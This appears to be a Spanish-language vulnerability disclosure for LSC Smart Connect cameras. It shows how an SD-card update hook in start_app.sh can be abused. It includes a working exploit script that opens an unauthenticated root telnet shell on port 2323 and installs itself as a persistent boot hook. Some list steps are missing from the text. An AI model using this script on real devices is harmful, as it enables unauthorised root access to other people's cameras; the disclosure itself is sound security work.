
Aquí está el CVE-2025-65817
| Campos | Valor |
|---|---|
| Título | Informe de vulnerabilidad: LSC Smart Connect Camera |
| Fecha | 2024-02-15 |
| Descripción | Abusando del hook de actualización de la tarjeta SD para lanzar shells remotas en cámaras LSC Smart Connect. |
| Etiquetas | iot, vulnerabilidad, cve |
| Firmware | 1.14.13 |
La vulnerabilidad encontrada consiste en explotar el sistema de actualización en start_app.sh, más precisamente a través del montaje de la tarjeta SD y del archivo update.nor.sh.
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"
La sección local/sbin/start_app.sh:50–99 confía ciegamente en cualquier archivo llamado update.nor.sh ubicado en la tarjeta SD. Durante el proceso de arranque, el script:
update.nor.sh a /tmp/update.nor.sh,Más adelante en la secuencia de arranque (local/sbin/start_app.sh:108–129), el archivo copiado:
Esta ejecución ocurre antes de que el ipc_service principal se inicie, lo que significa que el script se ejecuta en un entorno de máximos privilegios donde ya están disponibles las utilidades de red, las funciones de watchdog y los ayudantes de actualización.
El exploit consiste en crear un shell y abrir un puerto a través de telnetd, que está presente en la cámara:
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]
Solo necesitamos escribir un script .sh en la tarjeta SD y llamarlo update.nor.sh.
El exploit que elijo es:
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
Confirmamos que el puerto está abierto.

Nos conectamos a través de telnet:
